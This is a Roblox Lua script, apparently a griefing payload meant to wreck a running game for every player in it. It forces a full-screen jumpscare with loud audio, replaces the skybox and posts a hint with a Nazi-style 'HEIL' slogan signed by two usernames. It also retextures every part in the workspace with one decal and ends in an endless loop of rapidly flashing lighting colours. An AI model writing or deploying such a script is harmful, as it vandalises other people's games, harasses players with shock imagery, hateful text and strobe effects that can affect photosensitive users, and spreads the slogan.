-- Variables local jumpscareImageId = "rbxassetid://78964000303842" local jumpscareMusicId = "rbxassetid://1836685873" local jumpscareDuration = 7 -- Duration in seconds -- Function to trigger jumpscare local function triggerJumpscare() for _, player in pairs(game.Players:GetPlayers()) do if player:FindFirstChild("PlayerGui") then -- Create ScreenGui local gui = Instance.new("ScreenGui") gui.Name = "JumpscareGui" gui.Parent = player.PlayerGui -- Create ImageLabel local imageLabel = Instance.new("ImageLabel") imageLabel.Size = UDim2.new(1, 0, 1, 0) -- Cover entire screen imageLabel.Position = UDim2.new(0, 0, 0, 0) imageLabel.Image = jumpscareImageId imageLabel.BackgroundTransparency = 1 imageLabel.Parent = gui -- Play Sound local sound = Instance.new("Sound") sound.SoundId = jumpscareMusicId sound.Volume = 2 sound.Looped = false sound.Parent = player.PlayerGui sound:Play() -- Remove GUI after jumpscare duration task.delay(jumpscareDuration, function() gui:Destroy() sound:Destroy() end) end end end -- Trigger the jumpscare triggerJumpscare() local skyboxAssetId = "rbxassetid://94087043898013" local musicAssetId = "rbxassetid://1838111511" -- Add a Skybox to the game local function changeSkybox() local lighting = game:GetService("Lighting") -- Remove any existing skybox for _, child in pairs(lighting:GetChildren()) do if child:IsA("Sky") then child:Destroy() end end -- Create a new Skybox local newSkybox = Instance.new("Sky") newSkybox.Name = "CustomSkybox" newSkybox.SkyboxBk = skyboxAssetId newSkybox.SkyboxDn = skyboxAssetId newSkybox.SkyboxFt = skyboxAssetId newSkybox.SkyboxLf = skyboxAssetId newSkybox.SkyboxRt = skyboxAssetId newSkybox.SkyboxUp = skyboxAssetId newSkybox.Parent = lighting end -- Play music after 7 seconds with a reverb effect local function playMusic() local sound = Instance.new("Sound") sound.SoundId = musicAssetId sound.Name = "BackgroundMusic" sound.Volume = 1 sound.Looped = false sound.Parent = game:GetService("Workspace") -- Add Reverb Effect local reverbEffect = Instance.new("ReverbSoundEffect") reverbEffect.DecayTime = 2 -- Duration of the reverb reverbEffect.Density = 0.8 -- Thickness of the reverb reverbEffect.Diffusion = 0.1 -- Spread of the reverb reverbEffect.DryLevel = -10 -- Volume of the original sound reverbEffect.WetLevel = -100 -- Volume of the reverb reverbEffect.Parent = sound -- Play the sound sound:Play() end -- Execute the functions task.wait(7) changeSkybox() playMusic() -- Wait 7 seconds wait(7) -- Create a Hint local hint = Instance.new("Hint") hint.Parent = game.Workspace hint.Text = "ALL HEIL THE ARABZS!1!1!1!| eagle_mrleast |eagle_nya93zaltz" decalID = 94087043898013 function exPro(root) for _, v in pairs(root:GetChildren()) do if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset/?id="..decalID then v.Parent = nil elseif v:IsA("BasePart") then v.Material = "Plastic" v.Transparency = 0 local One = Instance.new("Decal", v) local Two = Instance.new("Decal", v) local Three = Instance.new("Decal", v) local Four = Instance.new("Decal", v) local Five = Instance.new("Decal", v) local Six = Instance.new("Decal", v) One.Texture = "http://www.roblox.com/asset/?id="..decalID Two.Texture = "http://www.roblox.com/asset/?id="..decalID Three.Texture = "http://www.roblox.com/asset/?id="..decalID Four.Texture = "http://www.roblox.com/asset/?id="..decalID Five.Texture = "http://www.roblox.com/asset/?id="..decalID Six.Texture = "http://www.roblox.com/asset/?id="..decalID One.Face = "Front" Two.Face = "Back" Three.Face = "Right" Four.Face = "Left" Five.Face = "Top" Six.Face = "Bottom" end exPro(v) end end function asdf(root) for _, v in pairs(root:GetChildren()) do asdf(v) end end exPro(game.Workspace) asdf(game.Workspace) while true do wait(0.1) game.Lighting.Ambient = Color3.new(math.random(), math.random(), math.random()) game.Lighting.ColorShift_Top = Color3.new(math.random(), math.random(), math.random()) game.Lighting.ColorShift_Bottom = Color3.new(math.random(), math.random(), math.random()) game.Lighting.ShadowColor = Color3.new(math.random(), math.random(), math.random()) end